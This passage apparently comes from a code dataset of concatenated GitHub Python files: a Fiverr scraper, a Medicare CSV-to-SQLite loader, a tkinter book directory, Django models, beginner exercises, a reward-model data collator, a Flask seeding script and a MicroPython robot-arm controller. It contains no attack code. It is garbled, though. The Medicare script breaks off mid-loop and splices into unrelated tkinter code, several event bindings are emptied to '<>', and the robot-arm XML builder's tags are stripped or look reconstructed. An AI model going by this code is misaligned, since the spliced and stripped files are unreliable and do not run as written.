filter_by.value\n if sort_by:\n payload[\"sort_by\"] = sort_by.value\n reviews: list[dict[str, str]] = []\n\n scraper = cloudscraper.create_scraper(sess=session, browser=\"chrome\")\n while True:\n data = scraper.get(url, headers=common_headers, params=payload)\n data = data.json()\n reviews.extend(data[\"reviews\"])\n if not data[\"has_next\"] or len(reviews) >= limit:\n break\n payload[\"last_star_rating_id\"] = reviews[-1][\"id\"]\n payload[\"last_review_id\"] = reviews[-1][\"id\"]\n payload[\"last_score\"] = \"0\"\n reviews = reviews[:limit]\n if group_by_buyer:\n merged_reviews: dict[str, list[dict[str, str]]] = {}\n for review in reviews:\n if review[\"username\"] in merged_reviews:\n merged_reviews[review[\"username\"]].append(review)\n else:\n merged_reviews[review[\"username\"]] = [review]\n return merged_reviews\n session.close()\n return reviews\n\n\n@app.get(\"/{username}/orders\", tags=[\"Seller Details\"])\nasync def get_orders(username: str, token=Depends(bearer)):\n url = f\"{URL}/users/{username}/manage_orders/type/completed\"\n cookies = {\"hodor_creds\": token.credentials}\n results = []\n scraper = cloudscraper.create_scraper()\n while True:\n while True:\n try:\n res = scraper.get(\n url, headers=common_headers, cookies=cookies, allow_redirects=False\n )\n break\n except CloudflareChallengeError:\n pass\n\n if res.status_code == 302:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED, detail=\"Unauthorized profile\"\n )\n data = res.json()\n results.extend(data[\"results\"])\n if not data.get(\"load_more_url\"):\n break\n url = \"https://www.fiverr.com\" + data[\"load_more_url\"]\n return results\n","repo_name":"salmannotkhan/fiverr-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"29261926229","text":"\n# coding: utf-8\n\n# In[1]:\n\n#Importing packages\nimport requests\nimport os\nimport zipfile\nimport openpyxl\nimport sqlite3\nimport glob\nimport csv\nimport numpy as np\nfrom numpy import array\n\n\n# In[2]:\n\n#url for the accessing 
the medicare data\nurl = \"https://data.medicare.gov/views/bg9k-emty/files/0a9879e0-3312-4719-a1db-39fd114890f1?content_type=application%2Fzip%3B%20charset%3Dbinary&filename=Hospital_Revised_Flatfiles.zip\"\n\n\n# In[3]:\n\n#Accessing the url\nr = requests.get(url)\n\n\n# In[4]:\n\n#Defining the staging directory name\nstaging_dir_name = \"staging\"\n\n\n# In[5]:\n\nstaging_dir_name = \"staging\"\nos.mkdir(staging_dir_name)\n\n\n# In[6]:\n\n#Checking if it is directory\nos.path.isdir(staging_dir_name)\n\n\n# In[7]:\n\n#Zip file name and path\nzip_file_name = os.path.join(staging_dir_name,\"test.zip\")\n\n\n# In[8]:\n\n#Checking if the zip file is created in the respective directory\nzip_file_name\n\n\n# In[9]:\n\n#\"wb\" is used to write in binary format\nzf = open(zip_file_name,\"wb\") \n\n\n# In[10]:\n\n#Writing the zip file content\nzf.write(r.content)\n\n\n# In[11]:\n\n#Closing the file\nzf.close()\n\n\n# In[12]:\n\n#'r' is used to read the file.......... extractall will unzip the contents\nz = zipfile.ZipFile(zip_file_name,'r')\n#Unzipping the test.zip file\nz.extractall(staging_dir_name)\n#Closing the zip file\nz.close()\n\n\n# In[13]:\n\n#Function to convert cp1252 to utf-8 format\ndef cp_to_utf (glob_dir):\n for file_name in glob.glob(glob_dir):\n print (file_name[8:])\n fn = os.path.join(staging_dir_name, file_name[8:])\n #print (\"*********************\")\n in_fp = open(fn,\"rt\",encoding = 'cp1252')\n input_data = in_fp.read()\n in_fp.close()\n ofn = os.path.join(staging_dir_name, file_name[8:])\n out_fp = open(ofn,\"wt\",encoding = 'utf-8')\n for c in input_data:\n if c != '\\0':\n out_fp.write(c)\n out_fp.close()\n #print(\"$$$$$$$$$$$$$$$$$$$$$$$$$\")\n #print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@\")\n\n\n# In[14]:\n\n#Converting the file name to table name as per the requirement\ndef tbl_name (glob_dir): \n #print(file_name)\n #print(file_name[8:-4])\n File_Name = file_name[8:-4]\n Table_Name = File_Name\n Table_Name = glob_dir[8:-4]\n print(Table_Name)\n Table_Name = Table_Name.lower()\n Table_Name = Table_Name.replace(' ', '_')\n Table_Name = Table_Name.replace('-', '_')\n Table_Name = Table_Name.replace('%', 'pct')\n Table_Name = Table_Name.replace('/', '_')\n if(Table_Name[0].islower() == False):\n T = 't_'+Table_Name\n #print(T)\n return T;\n #print(\"TTTTTTTTTTTTTTTTTTTTTTTTTTTTT\")\n else:\n T = Table_Name\n #print(T)\n #print(\"TTTTTTTTTTTTTTTTTTTTTTTTTTTTT\")\n return T;\n\n\n# In[15]:\n\n#Converting the column name as per the requirement\ndef col_name (C): \n #print(C)\n Column_Name = C\n #print(Column_Name)\n Column_Name = Column_Name.lower()\n Column_Name = Column_Name.replace(' ', '_')\n Column_Name = Column_Name.replace('-', '_')\n Column_Name = Column_Name.replace('%', 'pct')\n Column_Name = Column_Name.replace('/', '_')\n if(Column_Name[0].islower() == False):\n C = ['c_'+Column_Name]\n #print(C)\n return C;\n #print(\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCC\")\n else:\n C = [Column_Name]\n #print(C)\n #print(\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCC\")\n return C;\n\n\n# In[16]:\n\n#Defining the path of the file and calling function for UTF-8 encoding conversion\nglob_dir = os.path.join(staging_dir_name,\"*.csv\")\ncp_to_utf(glob_dir)\n\n\n# In[17]:\n\n#Creating tables in SQL lite and inserting the data\nfor file_name in glob.glob(glob_dir):\n if file_name[8:] != \"FY2015_Percent_Change_in_Medicare_Payments.csv\": \n with open(file_name, 'r', encoding = 'UTF-8') as file:\n reader = csv.reader(file)\n Col_Name = next(reader)\n #print (file_name)\n #print (Col_Name)\n #print 
(\"$$$$$$$$$$$$$$$$$$$$$$$$$$\")\n Tab = tbl_name(file_name)\n Col = []\n for C in Col_Name:\n Col = Col+col_name(C)\n print (Col)\n print (\"&&&&&&&&&&&&&&&&&&&&&&&&&\")\n #Defining the connection to db\n conn = sqlite3.connect(\"medicare_hospital_compare.db\")\n #Defining the table\n DDL = \"create table if not exists \" + Tab + \" (\"\n for C_Name in Col[:-1]:\n DDL = DDL+C_Name+\" text, \"\n DDL = DDL+Col[-1]+\" text)\"\n c1 = conn.cursor()\n #Executing query to create stage tables\n c1.execute(DDL)\n #data = []\n #data_lst = []\n data_lst_lst = [row for row in reader if row != [' ']]\n data_lst_tup = [tuple(l) for l in data_lst_lst]\n DML_I = \"Insert into \" + Tab + \" values (\"\n i = 1\n while (i>', get_selected_row)\n# Scrollbar.\nscroller = Scrollbar(window)\nscroller.place(x=340,y=103,height=257)\n# Configure scrollbar for Listbox.\nlisting.configure(yscrollcommand = scroller.set)\nscroller.configure(command = listing.yview)\n\nlisting.bind('<>', get_selected_row)\n# Buttons for various operations on data.\nbutton1 = Button(window, \n text = \"View All\", \n width = 12, \n command = view_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton1.place(x=370,y=200)\n\nbutton2 = Button(window, \n text = \"Search Entry\", \n width = 12, \n command = search_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton2.place(x=370,y=225)\n\nbutton3 = Button(window, \n text = \"Add Entry\", \n width = 12, \n command = add_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton3.place(x=370,y=250)\n\nbutton4=Button(window,\n text=\"Update\", \n width = 12, \n command = update_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton4.place(x=370,y=275)\n\nbutton5 = Button(window, \n text = \"Delete Selected\", \n width = 12, \n command = delete_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton5.place(x=370,y=300)\n\nbutton6 = Button(window, \n text = \"Close\", \n width = 12, \n command = close,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton6.place(x=370,y=325)\n\nimport webbrowser\n\ndef callback(event):\n webbrowser.open_new(\"https://github.com/mmaithani\")\ndef callback2(event):\n webbrowser.open_new(\"https://github.com/mmaithani/My-Python-projects/tree/master/1.book_dictionary\")\ndef insta(event):\n webbrowser.open_new(\"https://www.instagram.com/aee_nobody/\")\ndef twitter(event):\n webbrowser.open_new(\"https://twitter.com/e9a16bb235e6485?lang=en\")\n# root= Tk()\n#---------------------------------------------------------------------------------------------\nimg = ImageTk.PhotoImage(Image.open(\"banner.gif\"))\npanel = Label(window, image = img)\npanel.grid(row=0,column=0)\n###############################################################################################\nlink = Label(window, text=\"Github profile\",fg='blue',bg=\"#a1dbcd\", cursor=\"hand2\")\nlink.place(x=0,y=412)\nlink.bind(\"\", callback)\n\nlink2 = Label(window, text=\"Github project link\", fg=\"blue\",bg=\"#a1dbcd\", cursor=\"hand2\")\nlink2.place(x=0,y=430)\nlink2.bind(\"\", callback2)\n\nprofile = ImageTk.PhotoImage(Image.open(\"github_profile_pic.png\"))\npanel = Label(window, image =profile)\npanel.place(x=10,y=360)\n#---------------------------------------------------------------------------------------\ninstagram= ImageTk.PhotoImage(Image.open(\"insta.png\"))\npanel = Label(window, image =instagram)\npanel.place(x=110,y=365)\n\nlink2 = Label(window, text=\"Instagram\", fg=\"blue\",bg=\"#a1dbcd\", cursor=\"hand2\")\nlink2.place(x=110,y=410)\nlink2.bind(\"\", 
insta)\n#--------------------------------------------------------------------------------------------------\n\ntweet= ImageTk.PhotoImage(Image.open(\"twitter.png\"))\npanel = Label(window, image =tweet)\npanel.place(x=180,y=362)\n\nlink2 = Label(window, text=\"Twitter\", fg=\"blue\",bg=\"#a1dbcd\", cursor=\"hand2\")\nlink2.place(x=180,y=410)\nlink2.bind(\"<Button-1>\", twitter)\n#--------------------------------\n\n\n\n\n# Keep window open until closed.\nwindow.mainloop()\n","repo_name":"mmaithani/My-Python-projects","sub_path":"1.book_directory/(main)Frontend.py","file_name":"(main)Frontend.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71296754408","text":"from django.conf import settings\r\nfrom django.db import models\r\nfrom django.contrib.auth.models import User\r\nfrom django.db.models.enums import Choices\r\n\r\n\r\n# Create your models here.\r\nclass Table1_Tempuser(models.Model): \r\n mobilenumber = models.IntegerField()\r\n otp = models.CharField(max_length=100,null=True,blank=True)\r\n expiretime = models.TimeField(auto_now_add=True)\r\n createdtime = models.TimeField(auto_now_add=True) \r\n\r\nChoices = ((\"Active\",\"Active\"),\r\n(\"InActive\",\"InActive\"))\r\nclass Table2_Customer(models.Model):\r\n\r\n customername =models.CharField(max_length=100)\r\n dob = models.DateField()\r\n email = models.EmailField()\r\n mobilenumber = models.IntegerField()\r\n created_date = models.DateField(auto_now_add=True)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n\r\nclass Table4_tradetype(models.Model):\r\n tradeid = models.IntegerField()\r\n tradetype = models.CharField(max_length=100)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n \r\nclass Table3_tradesman(models.Model):\r\n Table_4_id = models.ForeignKey(Table4_tradetype,on_delete=models.CASCADE)\r\n tradesman_name = models.CharField(max_length=100)\r\n created_date = models.DateField(auto_now_add=True)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n\r\n\r\n \r\nclass Table6_Image_Uplodad(models.Model):\r\n Table2_id = models.ForeignKey(Table2_Customer,on_delete=models.CASCADE)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n imagepath = models.ImageField()\r\n created_date = models.DateField(auto_now_add=True)\r\n\r\n\r\n\r\nChoices = ((\"Pending\",\"Pending\"),\r\n(\"Booked\",\"Booked\"),(\"Cancel\",\"Cancel\"))\r\n\r\n\r\nclass Table5_booktradesman(models.Model):\r\n Table2_id = models.ForeignKey(Table2_Customer,on_delete=models.CASCADE)\r\n Table3_id =models.ForeignKey(Table3_tradesman,on_delete=models.CASCADE)\r\n date = models.DateField(auto_now_add=True)\r\n time = models.TimeField(auto_now_add=True)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n\r\n\r\n#class login(models.Model):\r\n# user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\r\n# created = models.DateTimeField(auto_now_add=True)\r\n# phone_number = models.IntegerField(blank=True)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Amjadkhanasas/flitpaytask","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
computer programmer, \r\nare playing with wooden blocks. They are building a pyramid.\r\n\r\nTheir pyramid is a bit weird, as it is actually a pyramid-shaped wall \r\n- it's flat. The pyramid is stacked according to one simple principle: \r\neach lower layer contains one block more than the layer above.\r\n\r\nYour task is to write a program which reads the number of blocks \r\nthe builders have, and outputs the height of the pyramid that can be built \r\nusing these blocks.\r\n\r\nNote: the height is measured by the number of fully completed layers \r\n- if the builders don't have a sufficient number of blocks and cannot \r\ncomplete the next layer, they finish their work immediately.\r\n\r\nTest your code using the data we've provided.\r\n\r\n@author: David\r\n\"\"\"\r\n\r\n#Programa que evalúa la altura (en bloques) de una pirámide\r\n\r\nnblocks = int(input(\"Ingrese el número de bloques\\t\"))\r\ncounter = 0\r\nb = 0 #acumulador de número de bloques\r\na = 0 #Indicador número de piso\r\n#for i in range (1,10):\r\nwhile (True):\r\n a = a + 1 #contador de número de pisos\r\n b = b + a #acumulador de número de bloques\r\n #print (a,end = \" \")\r\n #print (b,end = \" \")\r\n #print(\"\\n\")\r\n if (b-nblocks) == 0:\r\n print(\"número de bloques\",nblocks)\r\n print (\"The height of the pyramid is:\",a)\r\n break\r\n if (b >= nblocks):\r\n c = a - 1 # recálculo del número de pisos\r\n print(\"número de bloques\",nblocks)\r\n print (\"The height of the pyramid is:\",c)\r\n break\r\n\r\n# Para resolver el problema se hizo:\r\n# Una tabla comparativa n = 1,3,6,10,15,21,28 (número de bloques)\r\n # p = 1,2,3,04,05,06,07 (altura de la pirámide)\r\n# a = a + 1 es un contador interno al lazo while a = 1,2,3...\r\n# b = b + a suma el número de bloque acorde con el contador a\r\n# si b - nblocks == 0: el número de bloques ingresados sirve para hacer\r\n #pisos enteros\r\n# si b > nblocks: el número de bloques ingresados no es suficiente para\r\n # hacer un piso completo\r\n # num pisos c = a -1\r\n \r\n \r\n","repo_name":"JDavid121/Script-Curso-Cisco-Python","sub_path":"65 for loop.py","file_name":"65 for loop.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31967181176","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/5/6 5:50 p.m.\n# @Author : JianingWang\n# @File : data_collator.py\n\nimport torch\nfrom dataclasses import dataclass\nfrom typing import Optional\nfrom transformers import PreTrainedTokenizerBase\n\n\n@dataclass\nclass DataCollatorForDefaultPairwiseRewardTraining:\n tokenizer: PreTrainedTokenizerBase\n max_length: Optional[int] = 512\n pad_to_multiple_of: Optional[int] = None\n pad_to_max_length: Optional[bool] = None\n is_segment_spans: Optional[bool] = False\n\n def __call__(self, features):\n # Tokenize\n # is_train = features[0][\"is_train\"] > 0\n batch = []\n for f in features:\n\n chosen_sequences = f[\"chosen_sequences\"] + [self.tokenizer.pad_token_id] * (self.max_length - len(f[\"chosen_sequences\"]))\n chosen_attention_mask = f[\"chosen_attention_mask\"] + [0] * (self.max_length - len(f[\"chosen_attention_mask\"]))\n rejected_sequences = f[\"rejected_sequences\"] + [self.tokenizer.pad_token_id] * (self.max_length - len(f[\"rejected_sequences\"]))\n rejected_attention_mask = f[\"rejected_attention_mask\"] + [0] * (self.max_length - len(f[\"rejected_attention_mask\"]))\n\n # print(\"chosen_sequences=\", chosen_sequences)\n # print(\"chosen_attention_mask=\", 
chosen_attention_mask)\n # print(\"rejected_sequences=\", rejected_sequences)\n # print(\"rejected_attention_mask=\", rejected_attention_mask)\n \n batch.append({\n \"chosen_sequences\": chosen_sequences,\n \"chosen_attention_mask\": chosen_attention_mask,\n \"rejected_sequences\": rejected_sequences,\n \"rejected_attention_mask\": rejected_attention_mask,\n })\n\n # batch = self.tokenizer.pad(\n # batch,\n # padding=\"max_length\",\n # max_length=self.max_length,\n # return_tensors=\"pt\"\n # ) \n batch = {key: torch.Tensor([f[key] for f in batch]).long() for key in batch[0].keys()}\n\n return batch","repo_name":"HugAILab/HugNLP","sub_path":"processors/reinforcement_learning/data_collator.py","file_name":"data_collator.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"41370116573","text":"#crear una comparacion de dos edades 1 y edad 2\n\nedad1=int (input(\"ingrese edad1: \"))\nedad2=int (input(\"ingrese edad2: \"))\nif edad1>edad2:\n print (\"es mayor \") \nif edad1==edad2: \n print (\"son iguales\")\nelse :\n print (\"edad2 es mayor\")\n\n#preguntar 10 veces un entero y luego sumar con while\n\nx=1\nsuma=0\nwhile x<=10:\n valor=int(input(\"Ingrese un valor:\"))\n suma=suma+valor\n x=x+1\nprint (suma)\n\n\n#preguntar 10 veces un entero y luego sumar con FOR\n\nlista=[]\nfor x in range (10):\n lista.append (int(input(\"introduce valor en lista:\")))\n suma=0\nfor i in lista:\n\tsuma += i\nprint (\"el resultado es: \" +str (suma))\n\n#crear una funcion simple que MULTIPLIQUE,SUMA,RESTE Y DIVIDA dos numeros\n\ndef datos():\n global v1\n global v2\n v1=int(input(\"ingrese numeros\"))\n v2=int(input(\"ingrese numeros\"))\n\ndef suma():\n sumar= v1+v2\n print (\"el resultado de la suma\" +str(sumar) )\n\ndef resta():\n restar= v1-v2\n print (\"el resultado de la resta\" +str(restar) )\n\n\ndef dividir():\n divide= v1/v2\n print (\"el resultado de dividir\" +str(divide) ) \n\ndef multi():\n multiplicar= v1*v2\n print (\"el resultado de multiplicar\" +str(multiplicar) )\n\ndatos()\nsuma()\nresta()\ndividir()\nmulti()\n\n","repo_name":"room29/python","sub_path":"PRACTICAS.py","file_name":"PRACTICAS.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4057347214","text":"from flask.cli import FlaskGroup, click\nimport os\nimport ssl\nfrom cryptography import x509\nfrom cryptography.x509.oid import NameOID\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import serialization\n\nfrom project import app, db\nfrom project.models.User import User\nfrom project.models.Group import Group\nfrom project.models.Schedule import Schedule\nfrom project.models.Training import Training\nfrom project.models.Exercise import Exercise\n\nfrom datetime import time\nimport datetime\nfrom copy import copy\n\n\ndef generate_self_signed_cert(cert_file, key_file):\n from cryptography.hazmat.primitives.asymmetric import rsa\n # Generar una clave privada RSA\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n\n # Construir el certificado autofirmado\n subject = issuer = x509.Name([\n x509.NameAttribute(NameOID.COMMON_NAME, u\"localhost\")\n ])\n cert = x509.CertificateBuilder().subject_name(\n subject\n ).issuer_name(\n issuer\n ).public_key(\n 
private_key.public_key()\n ).serial_number(\n x509.random_serial_number()\n ).not_valid_before(\n datetime.datetime.utcnow()\n ).not_valid_after(\n # El certificado será válido por 365 días\n datetime.datetime.utcnow() + datetime.timedelta(days=365)\n ).add_extension(\n x509.SubjectAlternativeName([x509.DNSName(u\"localhost\")]), critical=False).sign(private_key, hashes.SHA256(), default_backend())\n\n # Guardar la clave privada en 'key.pem'\n with open(key_file, \"wb\") as key_file:\n key_file.write(private_key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption()\n ))\n\n # Guardar el certificado en 'cert.pem'\n with open(cert_file, \"wb\") as cert_file:\n cert_file.write(cert.public_bytes(serialization.Encoding.PEM))\n\n\ncert_file = \"cert.pem\"\nkey_file = \"key.pem\"\nif os.path.exists(cert_file) and os.path.exists(key_file):\n True\n # print(\"Los archivos 'cert.pem' y 'key.pem' ya existen.\")\nelse:\n generate_self_signed_cert(cert_file, key_file)\n # print(f\"Certificado autofirmado generado y guardado en '{cert_file}' y '{key_file}'.\")\ncontext = ssl.SSLContext(ssl.PROTOCOL_TLS)\ncontext.load_cert_chain(cert_file, key_file)\n\ncli = FlaskGroup(app)\n\n\n@cli.command(\"create_db\")\ndef create_db():\n db.drop_all()\n db.create_all()\n db.session.commit()\n\n\n@cli.command(\"seed_db\")\ndef seed_db():\n\n # Creacion de usuarios\n user1 = User(username='carlos', password='zantana', role=User.Role.TEACHER, gender=User.Gender.MALE, age=75)\n db.session.add(user1)\n user2 = User(username='gustavo', password='cerati', role=User.Role.TEACHER, gender=User.Gender.MALE, height=1.86, age=55)\n db.session.add(user2)\n user3 = User(username='vanilla', password='ice', role=User.Role.STUDENT, gender=User.Gender.MALE, age=55)\n db.session.add(user3)\n user4 = User(username='dua', password='lipa', role=User.Role.STUDENT, gender=User.Gender.FEMALE, height=1.73, age=27)\n db.session.add(user4)\n user5 = User(username='juan', password='mortadela', role=User.Role.STUDENT, gender=User.Gender.MALE, height=1.73, age=22)\n db.session.add(user5)\n\n db.session.commit()\n\n # Creacion de entrenamientos cada cual con sus respectivos ejercicios\n exercises = [\n Exercise(name=\"curl de biceps\", description=\"...\", speed=2.0, heart_rate=90.0, duration=30.0),\n Exercise(name=\"flexiones\", description=\"...\", speed=4.0, heart_rate=90.0, duration=30.0),\n Exercise(name=\"bicicleta\", description=\"...\", speed=7.0, heart_rate=90.0, duration=100.0)]\n training_arms = Training(name=\"Brazos\", description=\"Entrenamiento de brazos\", teacher_id=user1.id, exercises=exercises)\n exercises = [\n Exercise(name=\"sentadillas\", description=\"...\", speed=3.0, heart_rate=120.0, duration=30.0),\n Exercise(name=\"bicicleta\", description=\"...\", speed=7.0, heart_rate=90.0, duration=400.0)]\n training_legs = Training(name=\"Piernas\", description=\"Entrenamiento de piernas\", teacher_id=user2.id, exercises=exercises)\n exercises = [\n Exercise(name=\"abdominales\", description=\"...\", speed=3.0, heart_rate=120.0, duration=30.0),\n Exercise(name=\"bicicleta\", description=\"...\", speed=7.0, heart_rate=90.0, duration=300.0)]\n training_core = Training(name=\"Core\", description=\"Entrenamiento de core\", teacher_id=user2.id, exercises=exercises)\n\n # Creacion de grupos\n schedules = [\n Schedule(day=Schedule.Day.MONDAY, starttime=time(8, 0, 0), endingtime=time(12, 0, 0), training=training_legs),\n 
Schedule(day=Schedule.Day.THURSDAY, starttime=time(16, 0, 0), endingtime=time(18, 0, 0), training=training_legs)]\n group1 = Group(name='ciclismo rapido', privacy=Group.Privacy.PUBLIC, teacher=user1, description='Grupo centrado en la aceleracion del ritmo, que nadie te alcance.', capacity=20, schedules=schedules)\n group1.add_user(user3)\n group1.add_user(user4)\n db.session.add(group1)\n schedules = [\n Schedule(day=Schedule.Day.WEDNESDAY, starttime=time(17, 0, 0), endingtime=time(19, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.FRIDAY, starttime=time(16, 0, 0), endingtime=time(18, 0, 0), training=training_core)]\n group2 = Group(name='ciclismo alter', privacy=Group.Privacy.PRIVATE, teacher=user2, description='Ciclismo alternativo, conoce todo el potencial de la bicicleta.', difficulty=Group.Difficulty.MIDDLE, schedules=schedules)\n group2.add_user(user4)\n db.session.add(group2)\n schedules = [\n Schedule(day=Schedule.Day.MONDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.TUESDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.WEDNESDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.THURSDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.FRIDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.SATURDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.SUNDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs)]\n group3 = Group(name='ciclismo hardcore', privacy=Group.Privacy.PUBLIC, teacher=user2, description='Una vida, una bici, un destino.', difficulty=Group.Difficulty.HARD, capacity=10, schedules=schedules)\n db.session.add(group3)\n schedules = [\n Schedule(day=Schedule.Day.SUNDAY, starttime=time(6, 0, 0), endingtime=time(10, 0, 0), training=training_arms)]\n group4 = Group(name='grupo super exclusivo', privacy=Group.Privacy.PRIVATE, teacher=user1, description='El grupo mas exclusivo de todos.', difficulty=Group.Difficulty.EASY, capacity=1, schedules=schedules)\n group4.add_user(user3)\n db.session.add(group4)\n\n db.session.commit()\n\n\nif __name__ == \"__main__\":\n\n cli()\n # with app.app_context():\n # create_db()\n # seed_db()\n # app.run(ssl_context=context, host='0.0.0.0', port=5000, debug=True)\n","repo_name":"Sansanto2000/DEU2023-Backend","sub_path":"services/web/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6078761059","text":"#\n# Utilisation d'un bras articule par un navigateur Web\n#\n# Materiel :\n# Testé sur ESP32 WROOM et Heltec Wifi Kit 32\n# Bras impression 3D (https://www.thingiverse.com/thing:34829)\n# 5 servos SG90\n# MicroPython version 1.10\n#\n# Programme qui permet de piloter le bras articule via un navigateur \n# internet en WiFi et de jouer un scenario sauvegarde\n#\n# Auteur : iTechnoFrance\n#\n\nimport machine, time, network, socket, _thread\n\n# declaration des servos avec une frequence de 50 Hertz\nservo_pivot = machine.PWM(machine.Pin(12), freq=50)\nservo_bras_1 = machine.PWM(machine.Pin(13), freq=50)\nservo_bras_2 = machine.PWM(machine.Pin(14), freq=50)\nservo_bras_3 = machine.PWM(machine.Pin(26), freq=50)\nservo_pince = 
machine.PWM(machine.Pin(27), freq=50)\n\n# parametres des servos \nposition_pivot = 0\nposition_bras_1 = 0\nposition_bras_2 = 0\nposition_bras_3 = 0\nposition_pince = 0\n\n# permet de sauvegarder les mouvements pour les rejouer\nmouvements_pivot = []\nmouvements_bras_1 = []\nmouvements_bras_2 = []\nmouvements_bras_3 = []\nmouvements_pince = []\n\n# variable pour l'utilisation d'AJAX\nXML = ''\n\n# permet de quitter le Thread\nplay_infini = False\n \ndef config_wifi():\n    # configure le module en point d'acces Wifi\n    ap = network.WLAN(network.AP_IF) # creation point d'acces WiFi\n    ap.active(True) # activation du point d'acces WiFi \n    ap.config(essid='microarm', channel=11, hidden=False)\n    ip = ap.ifconfig()[0]\n    return ip\n \ndef initialisation_bras():\n    # initialise le bras\n    global position_pivot, position_bras_1, position_bras_2\n    global position_bras_3, position_pince\n    position_bras_1 = 80 # bras en haut\n    servo_bras_1.duty(position_bras_1)\n    time.sleep_ms(500)\n    position_bras_2 = 110 # bras en haut\n    servo_bras_2.duty(position_bras_2)\n    time.sleep_ms(500)\n    position_bras_3 = 60 # bras au milieu\n    servo_bras_3.duty(position_bras_3)\n    time.sleep_ms(500)\n    position_pivot = 60 # pivot au milieu\n    servo_pivot.duty(position_pivot)\n    position_pince = 90 # pince mi ouverte\n    servo_pince.duty(position_pince)\n \ndef construit_xml():\n    # permet de generer le xml a transmettre a la page html\n    # NB (editeur) : les balises XML de cette fonction avaient ete supprimees lors de\n    # l'extraction du fichier ; elles sont reconstituees ici et les noms de balises\n    # (servos, pivot, bras_1...) sont une hypothese\n    global XML\n    XML = \"<?xml version = '1.0' ?>\"\n    XML += \"<servos>\"\n    XML += \"<pivot>\"\n    XML += str(position_pivot)\n    XML += \"</pivot>\"\n    XML += \"<bras_1>\"\n    XML += str(position_bras_1)\n    XML += \"</bras_1>\"\n    XML += \"<bras_2>\"\n    XML += str(position_bras_2)\n    XML += \"</bras_2>\"\n    XML += \"<bras_3>\"\n    XML += str(position_bras_3)\n    XML += \"</bras_3>\"\n    XML += \"<pince>\"\n    XML += str(position_pince)\n    XML += \"</pince>\"\n    XML += \"</servos>\"\n \ndef pivot(nouvelle_position):\n    # positionne le pivot\n    global position_pivot\n    position_actuelle = position_pivot\n    if nouvelle_position >= position_actuelle:\n        for i in range(position_actuelle, nouvelle_position):\n            servo_pivot.duty(i)\n            time.sleep_ms(10)\n    if nouvelle_position < position_actuelle:\n        for i in range(position_actuelle, nouvelle_position, -1):\n            servo_pivot.duty(i)\n            time.sleep_ms(10)\n    position_pivot = nouvelle_position\n \ndef bras_1(nouvelle_position):\n    # positionne le 1er bras\n    global position_bras_1\n    position_actuelle = position_bras_1\n    if nouvelle_position >= position_actuelle:\n        for i in range(position_actuelle, nouvelle_position):\n            servo_bras_1.duty(i)\n            time.sleep_ms(30)\n    if nouvelle_position < position_actuelle:\n        for i in range(position_actuelle, nouvelle_position, -1):\n            servo_bras_1.duty(i)\n            time.sleep_ms(30)\n    position_bras_1 = nouvelle_position\n\ndef bras_2(nouvelle_position):\n    # positionne le second bras\n    global position_bras_2\n    position_actuelle = position_bras_2\n    if nouvelle_position >= position_actuelle:\n        for i in range(position_actuelle, nouvelle_position):\n            servo_bras_2.duty(i)\n            time.sleep_ms(30)\n    if nouvelle_position < position_actuelle:\n        for i in range(position_actuelle, nouvelle_position, -1):\n            servo_bras_2.duty(i)\n            time.sleep_ms(30)\n    position_bras_2 = nouvelle_position\n\ndef bras_3(nouvelle_position):\n    # positionne le 3eme bras\n    global position_bras_3\n    position_actuelle = position_bras_3\n    if nouvelle_position >= 